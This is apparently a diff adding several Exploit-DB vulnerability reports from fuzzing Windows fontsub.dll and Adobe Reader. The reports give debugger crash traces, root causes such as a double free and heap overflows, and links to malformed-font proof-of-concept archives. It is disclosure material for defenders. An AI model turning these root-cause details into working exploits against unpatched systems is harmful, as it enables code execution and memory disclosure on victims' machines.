00000155`3b64b060 1b1c191a 1f201d1e 23242122 27282526
00000155`3b64b070 2b2c292a 2f302d2e 33343132 37383536
0:000> !heap -p -a rdi
address 000001553b64b000 found in
_DPH_HEAP_ROOT @ 1553b5c1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1553b5c2af8: 1553b64b000 1ff88 - 1553b64a000 21000
00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
00007fffcca398f0 msvcrt!malloc+0x0000000000000070
00007fff9f4bfd1e FONTSUB!Mem_Alloc+0x0000000000000012
00007fff9f4bc08d FONTSUB!ReadAllocCmapFormat4Ids+0x00000000000000d1
00007fff9f4bc4d1 FONTSUB!ReadAllocCmapFormat4+0x0000000000000149
00007fff9f4c31d8 FONTSUB!MakeKeepGlyphList+0x0000000000000430
00007fff9f4b6c00 FONTSUB!CreateDeltaTTFEx+0x0000000000000168
00007fff9f4b6a63 FONTSUB!CreateDeltaTTF+0x00000000000002cb
00007fff9f4b132a FONTSUB!CreateFontPackage+0x000000000000015a
[...]
0:000> k
# Child-SP RetAddr Call Site
00 00000001`f4dfd660 00007fff`9f4c322a FONTSUB!GetGlyphIdx+0x9e
01 00000001`f4dfd6b0 00007fff`9f4b6c00 FONTSUB!MakeKeepGlyphList+0x482
02 00000001`f4dfd930 00007fff`9f4b6a63 FONTSUB!CreateDeltaTTFEx+0x168
03 00000001`f4dfda50 00007fff`9f4b132a FONTSUB!CreateDeltaTTF+0x2cb
04 00000001`f4dfdb90 00007ff6`1a8a85d1 FONTSUB!CreateFontPackage+0x15a
[...]
--- cut ---
The root cause of the crash seems to be a negative index into the glyph ID array, which was not anticipated by the developer. Additionally, we've encountered a few cases where the index is negative, but the base address of the array is also NULL, resulting in attempting to access addresses close to 0xfffffffffffffffe.
The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to disclose sensitive data from the process heap. It is easiest to reproduce with PageHeap enabled (with the "Backward" option on), but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47262.zip

62
exploits/windows/dos/47263.txt Normal file
View file

@ -0,0 +1,62 @@
-----=====[ Background ]=====-----
The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
-----=====[ Description ]=====-----
We have encountered the following crash in fontsub!MergeFormat12Cmap:
--- cut ---
=======================================
VERIFIER STOP 0000000000000007: pid 0x2ADC: Heap block already freed.
000001F435091000 : Heap handle for the heap owning the block.
000001F4350969C0 : Heap block being freed again.
00000000000001BC : Size of the heap block.
0000000000000000 : Not used
=======================================
This verifier stop is not continuable. Process will be terminated
when you use the `go' debugger command.
=======================================
(2adc.5c10): Break instruction exception - code 80000003 (first chance)
vrfcore!VerifierStopMessageEx+0x7dc:
00007fff`9b90263c cc int 3
0:000> k
# Child-SP RetAddr Call Site
00 00000093`7bbcc730 00007fff`9b908540 vrfcore!VerifierStopMessageEx+0x7dc
01 00000093`7bbcca90 00007fff`9b7f619b vrfcore!VfCoreRedirectedStopMessage+0x90
02 00000093`7bbccb20 00007fff`9b7f4eb0 verifier!VerifierStopMessage+0xbb
03 00000093`7bbccbd0 00007fff`9b7f2582 verifier!AVrfpDphReportCorruptedBlock+0x1c0
04 00000093`7bbccc90 00007fff`9b7f2623 verifier!AVrfpDphFindBusyMemoryNoCheck+0x6a
05 00000093`7bbcccf0 00007fff`9b7f27e9 verifier!AVrfpDphFindBusyMemory+0x1f
06 00000093`7bbccd30 00007fff`9b7f41bd verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x25
07 00000093`7bbccd60 00007fff`cf653ab8 verifier!AVrfDebugPageHeapFree+0x8d
08 00000093`7bbccdc0 00007fff`cf58ae08 ntdll!RtlDebugFreeHeap+0x3c
09 00000093`7bbcce20 00007fff`cf58f0c9 ntdll!RtlpFreeHeap+0xa8
0a 00000093`7bbcd050 00007fff`9b90bf42 ntdll!RtlFreeHeap+0x409
0b 00000093`7bbcd100 00007fff`cca3984c vrfcore!VfCoreRtlFreeHeap+0x22
0c 00000093`7bbcd150 00007fff`aa5491fe msvcrt!free+0x1c
0d 00000093`7bbcd180 00007fff`aa5496f8 FONTSUB!MergeFormat12Cmap+0x12e
0e 00000093`7bbcd250 00007fff`aa54b046 FONTSUB!MergeCmapTables+0x444
0f 00000093`7bbcd330 00007fff`aa54baac FONTSUB!MergeFonts+0x5a6
10 00000093`7bbcd4e0 00007fff`aa5414b2 FONTSUB!MergeDeltaTTF+0x3ec
11 00000093`7bbcd620 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132
[...]
--- cut ---
A similar double-free crash was also observed at FONTSUB!MergeFormat12Cmap+0x13b, which is the second free() call directly after a MakeFormat12MergedGlyphList() call.
The root cause of the crash seems to be the fact that in case of an error, the MakeFormat12MergedGlyphList() function frees the buffer pointed to by its first/third argument, and then its caller, MergeFormat12Cmap(), also unconditionally frees both buffers.
The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47263.zip

62
exploits/windows/dos/47264.txt Normal file
View file

@ -0,0 +1,62 @@
-----=====[ Background ]=====-----
The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
-----=====[ Description ]=====-----
We have encountered the following crash in fontsub!FixSbitSubTables:
--- cut ---
(8ec.5f20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
FONTSUB!FixSbitSubTables+0x9a9:
00007fff`b4841371 6644892446 mov word ptr [rsi+rax*2],r12w ds:0000023c`a6765000=????
0:000> ? rsi
Evaluate expression: 2459514064800 = 0000023c`a6764fa0
0:000> ? rax
Evaluate expression: 48 = 00000000`00000030
0:000> ? r12w
Evaluate expression: 0 = 00000000`00000000
0:000> !heap -p -a rsi
address 0000023ca6764fa0 found in
_DPH_HEAP_ROOT @ 23ca6681000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
23ca6683888: 23ca6764fa0 60 - 23ca6764000 2000
unknown!printable
00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
00007fffcca398f0 msvcrt!malloc+0x0000000000000070
00007fffb483fd1e FONTSUB!Mem_Alloc+0x0000000000000012
00007fffb48412ac FONTSUB!FixSbitSubTables+0x00000000000008e4
00007fffb4841a5a FONTSUB!FixSbitSubTableArray+0x00000000000001f6
00007fffb4842460 FONTSUB!ModSbit+0x0000000000000520
00007fffb48370aa FONTSUB!CreateDeltaTTFEx+0x0000000000000612
00007fffb4836a63 FONTSUB!CreateDeltaTTF+0x00000000000002cb
00007fffb483132a FONTSUB!CreateFontPackage+0x000000000000015a
[...]
0:000> k
# Child-SP RetAddr Call Site
00 000000b1`2ccfd580 00007fff`b4841a5a FONTSUB!FixSbitSubTables+0x9a9
01 000000b1`2ccfd6c0 00007fff`b4842460 FONTSUB!FixSbitSubTableArray+0x1f6
02 000000b1`2ccfd7e0 00007fff`b48370aa FONTSUB!ModSbit+0x520
03 000000b1`2ccfd920 00007fff`b4836a63 FONTSUB!CreateDeltaTTFEx+0x612
04 000000b1`2ccfda40 00007fff`b483132a FONTSUB!CreateDeltaTTF+0x2cb
05 000000b1`2ccfdb80 00007ff6`1a8a85d1 FONTSUB!CreateFontPackage+0x15a
[...]
--- cut ---
The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 4 proof of concept malformed font files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47264.zip

60
exploits/windows/dos/47265.txt Normal file
View file

@ -0,0 +1,60 @@
-----=====[ Background ]=====-----
The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
-----=====[ Description ]=====-----
We have encountered crashes in fontsub!ReadTableIntoStructure similar to the following:
--- cut ---
(7ac.378c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
FONTSUB!ReadTableIntoStructure+0x378:
00007fff`c0874150 6689540110 mov word ptr [rcx+rax+10h],dx ds:000001f7`a7429010=????
0:000> ? rcx
Evaluate expression: 32 = 00000000`00000020
0:000> ? rax
Evaluate expression: 2163174707168 = 000001f7`a7428fe0
0:000> ? dx
Evaluate expression: 3 = 00000000`00000003
0:000> !heap -p -a rax
address 000001f7a7428fe0 found in
_DPH_HEAP_ROOT @ 1f7a7271000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1f7a7276c98: 1f7a7428fe0 20 - 1f7a7428000 2000
00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
00007fffcca398f0 msvcrt!malloc+0x0000000000000070
00007fffc086fd1e FONTSUB!Mem_Alloc+0x0000000000000012
00007fffc0875562 FONTSUB!MergeEblcEbdtTables+0x0000000000000b02
00007fffc086b0a3 FONTSUB!MergeFonts+0x0000000000000603
00007fffc086baac FONTSUB!MergeDeltaTTF+0x00000000000003ec
00007fffc08614b2 FONTSUB!MergeFontPackage+0x0000000000000132
[...]
0:000> k
# Child-SP RetAddr Call Site
00 000000d8`664fd3d0 00007fff`c0875599 FONTSUB!ReadTableIntoStructure+0x378
01 000000d8`664fd480 00007fff`c086b0a3 FONTSUB!MergeEblcEbdtTables+0xb39
02 000000d8`664fd690 00007fff`c086baac FONTSUB!MergeFonts+0x603
03 000000d8`664fd840 00007fff`c08614b2 FONTSUB!MergeDeltaTTF+0x3ec
04 000000d8`664fd980 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132
[...]
--- cut ---
In total, we have discovered crashes in four different locations inside the ReadTableIntoStructure() function.
The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 4 proof of concept malformed font files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47265.zip

59
exploits/windows/dos/47266.txt Normal file
View file

@ -0,0 +1,59 @@
-----=====[ Background ]=====-----
The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
-----=====[ Description ]=====-----
We have encountered the following crash in fontsub!ReadAllocFormat12CharGlyphMapList:
--- cut ---
(5a30.397c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
FONTSUB!ReadAllocFormat12CharGlyphMapList+0x13d:
00007fff`c086cf8d 448904c8 mov dword ptr [rax+rcx*8],r8d ds:00000225`050b9000=????????
0:000> ? rax
Evaluate expression: 2358021689232 = 00000225`050b8f90
0:000> ? rcx
Evaluate expression: 14 = 00000000`0000000e
0:000> ? r8d
Evaluate expression: 4294967286 = 00000000`fffffff6
0:000> !heap -p -a rax
address 00000225050b8f90 found in
_DPH_HEAP_ROOT @ 22505011000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
22505012478: 225050b8f90 68 - 225050b8000 2000
00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
00007fffcca398f0 msvcrt!malloc+0x0000000000000070
00007fffc086fd1e FONTSUB!Mem_Alloc+0x0000000000000012
00007fffc086cf24 FONTSUB!ReadAllocFormat12CharGlyphMapList+0x00000000000000d4
00007fffc08706cd FONTSUB!ModCmap+0x0000000000000459
00007fffc0866eab FONTSUB!CreateDeltaTTFEx+0x0000000000000413
00007fffc0866a63 FONTSUB!CreateDeltaTTF+0x00000000000002cb
00007fffc086132a FONTSUB!CreateFontPackage+0x000000000000015a
[...]
0:000> k
# Child-SP RetAddr Call Site
00 000000ad`62cfd4b0 00007fff`c08706cd FONTSUB!ReadAllocFormat12CharGlyphMapList+0x13d
01 000000ad`62cfd520 00007fff`c0866eab FONTSUB!ModCmap+0x459
02 000000ad`62cfd660 00007fff`c0866a63 FONTSUB!CreateDeltaTTFEx+0x413
03 000000ad`62cfd780 00007fff`c086132a FONTSUB!CreateDeltaTTF+0x2cb
04 000000ad`62cfd8c0 00007ff6`1a8a85d1 FONTSUB!CreateFontPackage+0x15a
[...]
--- cut ---
The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47266.zip

61
exploits/windows/dos/47267.txt Normal file
View file

@ -0,0 +1,61 @@
-----=====[ Background ]=====-----
The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
-----=====[ Description ]=====-----
We have encountered the following crash in fontsub!WriteTableFromStructure:
--- cut ---
(3890.25ac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
FONTSUB!WriteTableFromStructure+0x6e:
00007fff`aa544326 0fb74810 movzx ecx,word ptr [rax+10h] ds:000001ac`2d48a000=????
0:000> dd rax
000001ac`2d489ff0 d0d0d0c0 d0d0d0d0 d0d0d0d0 d0d0d0d0
000001ac`2d48a000 ???????? ???????? ???????? ????????
000001ac`2d48a010 ???????? ???????? ???????? ????????
000001ac`2d48a020 ???????? ???????? ???????? ????????
000001ac`2d48a030 ???????? ???????? ???????? ????????
000001ac`2d48a040 ???????? ???????? ???????? ????????
000001ac`2d48a050 ???????? ???????? ???????? ????????
000001ac`2d48a060 ???????? ???????? ???????? ????????
0:000> !heap -p -a rax
address 000001ac2d489ff0 found in
_DPH_HEAP_ROOT @ 1ac2d041000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1ac2d0495b0: 1ac2d489ff0 1 - 1ac2d489000 2000
00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
00007fffcca398f0 msvcrt!malloc+0x0000000000000070
00007fffaa53fd1e FONTSUB!Mem_Alloc+0x0000000000000012
00007fffaa545562 FONTSUB!MergeEblcEbdtTables+0x0000000000000b02
00007fffaa53b0a3 FONTSUB!MergeFonts+0x0000000000000603
00007fffaa53baac FONTSUB!MergeDeltaTTF+0x00000000000003ec
00007fffaa5314b2 FONTSUB!MergeFontPackage+0x0000000000000132
[...]
0:000> k
# Child-SP RetAddr Call Site
00 00000078`dc2fd380 00007fff`aa545634 FONTSUB!WriteTableFromStructure+0x6e
01 00000078`dc2fd490 00007fff`aa53b0a3 FONTSUB!MergeEblcEbdtTables+0xbd4
02 00000078`dc2fd6a0 00007fff`aa53baac FONTSUB!MergeFonts+0x603
03 00000078`dc2fd850 00007fff`aa5314b2 FONTSUB!MergeDeltaTTF+0x3ec
04 00000078`dc2fd990 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132
[...]
--- cut ---
The root cause of the crash seems to be the fact that the MergeEblcEbdtTables() function may allocate a 0-sized buffer and pass it to WriteTableFromStructure() as one of the fields of a structure passed through the fifth argument, but the WriteTableFromStructure() function assumes that the buffer is at least 32 bytes long, and unconditionally reads from it at offset 16, and other offsets later on in the routine.
The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to disclose sensitive data from the process address space. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47267.zip

71
exploits/windows/dos/47268.txt Normal file
View file

@ -0,0 +1,71 @@
-----=====[ Background ]=====-----
The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
-----=====[ Description ]=====-----
We have encountered the following crash in fontsub!MakeFormat12MergedGlyphList:
--- cut ---
(48e4.50e0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
FONTSUB!MakeFormat12MergedGlyphList+0x176:
00007fff`c086908a 458904ca mov dword ptr [r10+rcx*8],r8d ds:000001a4`4ebf1000=????????
0:000> ? r10
Evaluate expression: 1805184796672 = 000001a4`4d660800
0:000> ? rcx
Evaluate expression: 2826496 = 00000000`002b2100
0:000> ? r8d
Evaluate expression: 5 = 00000000`00000005
0:000> dd r10
000001a4`4d660800 00000000 00000000 00000020 00000003
000001a4`4d660810 00000021 00000004 00000022 00000005
000001a4`4d660820 00000023 00000006 00000024 00000007
000001a4`4d660830 00000025 00000008 00000026 00000009
000001a4`4d660840 00000027 0000000a 00000028 0000000b
000001a4`4d660850 00000029 0000000c 0000002a 0000000d
000001a4`4d660860 0000002b 0000000e 0000002c 0000000f
000001a4`4d660870 0000002d 00000010 0000002e 00000011
0:000> !heap -p -a r10
address 000001a44d660800 found in
_DPH_HEAP_ROOT @ 1a44c521000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1a44c5255b0: 1a44d660800 1590800 - 1a44d660000 1592000
00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
00007fffcca398f0 msvcrt!malloc+0x0000000000000070
00007fffc086fd1e FONTSUB!Mem_Alloc+0x0000000000000012
00007fffc0869011 FONTSUB!MakeFormat12MergedGlyphList+0x00000000000000fd
00007fffc08691ee FONTSUB!MergeFormat12Cmap+0x000000000000011e
00007fffc08696f8 FONTSUB!MergeCmapTables+0x0000000000000444
00007fffc086b046 FONTSUB!MergeFonts+0x00000000000005a6
00007fffc086baac FONTSUB!MergeDeltaTTF+0x00000000000003ec
00007fffc08614b2 FONTSUB!MergeFontPackage+0x0000000000000132
[...]
0:000> k
# Child-SP RetAddr Call Site
00 0000000c`1c7dd310 00007fff`c08691ee FONTSUB!MakeFormat12MergedGlyphList+0x176
01 0000000c`1c7dd350 00007fff`c08696f8 FONTSUB!MergeFormat12Cmap+0x11e
02 0000000c`1c7dd420 00007fff`c086b046 FONTSUB!MergeCmapTables+0x444
03 0000000c`1c7dd500 00007fff`c086baac FONTSUB!MergeFonts+0x5a6
04 0000000c`1c7dd6b0 00007fff`c08614b2 FONTSUB!MergeDeltaTTF+0x3ec
05 0000000c`1c7dd7f0 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132
[...]
--- cut ---
The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 2 proof of concept malformed font files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47268.zip

56
exploits/windows/dos/47269.txt Normal file
View file

@ -0,0 +1,56 @@
-----=====[ Background ]=====-----
The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
-----=====[ Description ]=====-----
We have encountered the following crash in fontsub!FixSbitSubTableFormat1:
--- cut ---
(e38.4e58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
FONTSUB!FixSbitSubTableFormat1+0x76:
00007fff`c08717ce 438b0c1a mov ecx,dword ptr [r10+r11] ds:000001fa`7e952000=????????
0:000> ? r10
Evaluate expression: 64 = 00000000`00000040
0:000> ? r11
Evaluate expression: 2175377153984 = 000001fa`7e951fc0
0:000> !heap -p -a r11
address 000001fa7e951fc0 found in
_DPH_HEAP_ROOT @ 1fa7e871000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1fa7e873958: 1fa7e951fc0 40 - 1fa7e951000 2000
00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
00007fffcca398f0 msvcrt!malloc+0x0000000000000070
00007fffc086fd1e FONTSUB!Mem_Alloc+0x0000000000000012
00007fffc08723db FONTSUB!ModSbit+0x000000000000049b
00007fffc08670aa FONTSUB!CreateDeltaTTFEx+0x0000000000000612
00007fffc0866a63 FONTSUB!CreateDeltaTTF+0x00000000000002cb
00007fffc086132a FONTSUB!CreateFontPackage+0x000000000000015a
[...]
0:000> k
# Child-SP RetAddr Call Site
00 00000006`9dcfd2d0 00007fff`c0871b0e FONTSUB!FixSbitSubTableFormat1+0x76
01 00000006`9dcfd310 00007fff`c0872460 FONTSUB!FixSbitSubTableArray+0x2aa
02 00000006`9dcfd430 00007fff`c08670aa FONTSUB!ModSbit+0x520
03 00000006`9dcfd570 00007fff`c0866a63 FONTSUB!CreateDeltaTTFEx+0x612
04 00000006`9dcfd690 00007fff`c086132a FONTSUB!CreateDeltaTTF+0x2cb
05 00000006`9dcfd7d0 00007ff6`1a8a85d1 FONTSUB!CreateFontPackage+0x15a
[...]
--- cut ---
The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to disclose sensitive data from the process address space. It is easiest to reproduce with PageHeap enabled. Attached are 3 proof of concept malformed font files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47269.zip

102
exploits/windows/dos/47270.txt Normal file
View file

@ -0,0 +1,102 @@
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
(180c.327c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=27829020 ebx=1537d7d8 ecx=00000030 edx=00000001 esi=27828ff0 edi=1537d890
eip=609ed114 esp=2ad6a1c0 ebp=2ad6a208 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
VCRUNTIME140!TrailingDownVec+0x1d4:
609ed114 f30f6f4e10 movdqu xmm1,xmmword ptr [esi+10h] ds:002b:27829000=????????????????????????????????
0:014> kb
# ChildEBP RetAddr Args to Child
00 2ad6a1c4 10dfaec3 1537d890 27828ff0 00000030 VCRUNTIME140!TrailingDownVec+0x1d4 [f:\dd\vctools\crt\vcruntime\src\string\i386\memcpy.asm @ 635]
01 2ad6a208 10d737f2 153156b0 27828ff0 00000010 AGM!AGMGetVersion+0x74273
02 2ad6a244 10d7522f 2ad6a27c 153156b0 27828ff0 AGM!AGMTerminate+0x14f42
03 2ad6a290 0f5ab6b8 2ad6a2b4 153158b8 27828ff0 AGM!AGMTerminate+0x1697f
04 2ad6a2b8 0f49861b 1b7a27f4 27828ff0 00000010 AcroRd32!AX_PDXlateToHostEx+0x1fd668
05 2ad6a2f8 0f692cea 1b7a27f4 27828ff0 00000010 AcroRd32!AX_PDXlateToHostEx+0xea5cb
06 2ad6a414 0f21a7d9 00000001 d497abe9 00000000 AcroRd32!AX_PDXlateToHostEx+0x2e4c9a
07 2ad6a4c8 0f219928 2ad6a870 00000000 d497a735 AcroRd32!DllCanUnloadNow+0x181819
08 2ad6a814 0f2198e6 2ad6a870 1b577188 d497a76d AcroRd32!DllCanUnloadNow+0x180968
09 2ad6a84c 0f2197c1 2ad6a870 1b577188 2ad6a8dc AcroRd32!DllCanUnloadNow+0x180926
0a 2ad6a8b8 0f218788 c0010000 000001bd 1b577188 AcroRd32!DllCanUnloadNow+0x180801
0b 2ad6ad18 0f215cd7 2ad6b01c 0c3d578c c0010000 AcroRd32!DllCanUnloadNow+0x17f7c8
0c 2ad6c4f8 0f215955 0c3d578c c0010000 000001bd AcroRd32!DllCanUnloadNow+0x17cd17
0d 2ad6c5c8 0f1f93ed d497c989 1b577188 00000000 AcroRd32!DllCanUnloadNow+0x17c995
0e 2ad6c6a8 0f270753 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
0f 2ad6c708 0f218184 00000000 00000000 00000000 AcroRd32!CTJPEGDecoderRelease+0x358c3
10 2ad6dedc 0f215955 0c3d5708 c0010000 000001be AcroRd32!DllCanUnloadNow+0x17f1c4
11 2ad6dfac 0f1f93ed d497efad 0c3c08a0 00000000 AcroRd32!DllCanUnloadNow+0x17c995
12 2ad6e08c 0f270753 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
13 2ad6e0ec 0f218184 00000001 00000000 00000000 AcroRd32!CTJPEGDecoderRelease+0x358c3
14 2ad6f8c0 0f215955 0c3d5684 c0010000 000001b2 AcroRd32!DllCanUnloadNow+0x17f1c4
15 2ad6f990 0f1f93ed d497f551 00000000 1b79f458 AcroRd32!DllCanUnloadNow+0x17c995
16 2ad6fa70 0f222848 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
17 2ad6fac8 0f222647 00000000 00000000 0f2220d0 AcroRd32!DllCanUnloadNow+0x189888
18 2ad6fb34 0f221fec d497f47d 0f221540 15ab5938 AcroRd32!DllCanUnloadNow+0x189687
19 2ad6fb5c 0f221551 0d104ab8 0f221540 2ad6fb80 AcroRd32!DllCanUnloadNow+0x18902c
